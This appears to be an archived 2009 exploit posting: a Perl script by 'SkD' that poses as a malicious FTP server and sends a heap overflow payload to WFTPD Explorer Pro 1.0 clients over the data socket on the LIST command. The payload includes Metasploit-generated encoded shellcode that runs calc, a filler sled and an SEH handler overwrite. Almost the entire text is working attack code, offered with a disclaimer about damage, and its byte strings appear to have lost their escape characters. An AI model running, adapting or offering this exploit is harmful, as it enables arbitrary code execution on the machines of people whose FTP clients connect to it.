wftpd-overflow.txt
Posted on 29 January 2009
#!/usr/bin/perl # # WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit # --------------------------------------------------- # Exploit by SkD (skdrat@hotmail.com) # # This is a remote heap overflow exploit for # WFTPD Explorer Pro 1.0 by Texas Imperial Software. # (Vendors website = http://www.wftpd.com) # # Tested on Windows 2000 SP4. # # I haven't used the more common methods of overwritting # PEB or UEF as it seemed both of them were not called # when the heap was overflowed, probably due to clean # clear ups when the overflow is detected. So I chose # to overwrite a local SEH handler address. I have tested # it numerously and the success rate is 100% in Win2k Sp4. # The exploit is basically based on the PoC by r4x # and it recreates the scenario but also exploits it by # creating two sockets, which the vital point is the # data socket. # # Enjoy it ladies & gents. # # Greets fly out to InTeL & str0ke. # # Note: Author has no responsibility over the damage you do # with this! use IO::Socket; use warnings; use strict; print "[x] WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit "; print "[x] Exploit by SkD (skdrat@ hotmail.com) "; my @requests = ("USER", "PASS", "TYPE", "PWD", "PASV", "LIST"); my @response = ("331 Password required. ", "230 User logged in. ", "200 Type set to I. ", "257 '/' is current directory. ", "227 Entering Passive Mode (127,0,0,1,100,100). ", "150 Opening ASCII mode data connection for file list. "); # win32_exec - EXITFUNC=thread CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34". "x42x50x42x30x42x50x4bx38x45x34x4ex43x4bx38x4ex47". "x45x30x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx48". "x4fx35x42x42x41x50x4bx4ex49x54x4bx58x46x43x4bx58". "x41x30x50x4ex41x53x42x4cx49x49x4ex4ax46x48x42x4c". "x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e". "x46x4fx4bx33x46x45x46x32x46x30x45x47x45x4ex4bx58". "x4fx35x46x52x41x50x4bx4ex48x46x4bx38x4ex50x4bx44". "x4bx48x4fx55x4ex31x41x30x4bx4ex4bx38x4ex31x4bx48". "x41x30x4bx4ex49x38x4ex55x46x52x46x50x43x4cx41x43". "x42x4cx46x36x4bx38x42x54x42x43x45x38x42x4cx4ax47". "x4ex50x4bx38x42x34x4ex50x4bx38x42x57x4ex31x4dx4a". "x4bx48x4ax36x4ax30x4bx4ex49x30x4bx58x42x38x42x4b". "x42x30x42x30x42x50x4bx58x4ax56x4ex33x4fx45x41x33". "x48x4fx42x56x48x45x49x58x4ax4fx43x38x42x4cx4bx47". "x42x45x4ax46x4fx4ex50x4cx42x4ex42x56x4ax36x4ax59". "x50x4fx4cx48x50x50x47x45x4fx4fx47x4ex43x36x41x36". "x4ex36x43x56x42x30x5a"; my $heapend = #The heap sometimes needs to be fed (end) with strange bytes ;) "x83xc5x7ax83xc5x7ax8bx45x00xbdx68xc3xd3x55xa7x86". #No specific instructions "xb9x42x42x42x42x40x40x40x40x39x08x75xf8xffxe0x2f". #No specific instructions "xefxdex50xc6xabx54xc3x48x9cx4dxa7x9cxf3x54xc7x8a". #No specific instructions "x58x61xa7xc2x3dx64xecx5ax7fxd1xecxb7xd4x94xe6xce". #No specific instructions "xd2x97xc7x37xe8x01x08xc7xa6xb0xa7x9cxf7x54xc7xa5". #No specific instructions "x58x59x67x48x8cx49x2dx28x58x49xa7xc2x38xdcx70xe7". #No specific instructions "xd7x96x1dx03xb7xdex6cxf3x56x95x54xcfx58x15x20x48". #No specific instructions "xa3x49x81x48xbbx5dxc7xcax58xd5x9cxc3xd3x55xa7xab". #No specific instructions "xefx0ax1dx35xb3x03xa5x3bx50x95x57x93xbbxbaxe2x23". #No specific instructions "xb3x3dxb4x3dx59x5bx7bx3cx34x36x4dxafxb0x55x2cxc3"; #No specific instructions my $overflow1 = "x41" x (1024 - length($shellcode)); my $overflow2 = "x42" x 144; my $overwriteaddr = "x18xfex91x00"; #SEH Handler Address, will be called after a deliberate exception my $shellcodeaddr = "xd0x7axd3x00"; #Address of a huge sled of 0x41 bytes that will lead to the shellcode my $heappart = "x41" x 6 ."xEBx08".$shellcodeaddr.$overwriteaddr."x41" x 6 ."xEBx08"; #JMPs here are used in some cases my $payload = $overflow1.$shellcode.$heappart.$shellcodeaddr.$overwriteaddr. $heapend.$overflow2." "; #Heap overflow packet payload ;) while(1) { my $sock1=new IO::Socket::INET(Listen=>1,LocalAddr => "127.0.0.1",LocalPort=>21,Proto=>'tcp'); my $sock2=new IO::Socket::INET(Listen=>1,LocalAddr => "127.0.0.1",LocalPort=>25700,Proto=>'tcp'); die unless $sock1; die unless $sock2; print "[x] Waiting for clients ... "; my $s1; my $s2; while($s1=$sock1->accept()){ print " [x] Got a client ! "; print $s1 "220 Welcome to SkD FTPDAEMON "; while(my $request = <$s1>){ my @arr = split("x20", $request); print " [x] Request = ".$arr[0]." "; if(length($arr[0]) == 0){ print $s1 "502 Command not implemented. "; sleep(0.25); } elsif($arr[0] eq $requests[0]){ print $s1 $response[0]; sleep(0.25); } elsif($arr[0] eq $requests[1]){ print $s1 $response[1]; sleep(0.25); } elsif($arr[0] eq $requests[2]){ print $s1 $response[2]; sleep(0.25); } elsif($arr[0] eq $requests[3]){ print $s1 $response[3]; sleep(0.25); } elsif($arr[0] eq $requests[4]){ print $s1 $response[4]; sleep(0.25); $s2 = $sock2->accept(); print " [x] Data socket connected! "; } elsif($arr[0] eq $requests[5]){ print " [x] Sending exploit ;)! "; print $s1 $response[5]; sleep(1); print $s2 $payload; sleep(1); print " [x] Exploitation done. "; last; } } print " [x] Client disconnected. "; close $sock1; #Clean up socket1 close $sock2; #Clean up socket2 last; } }
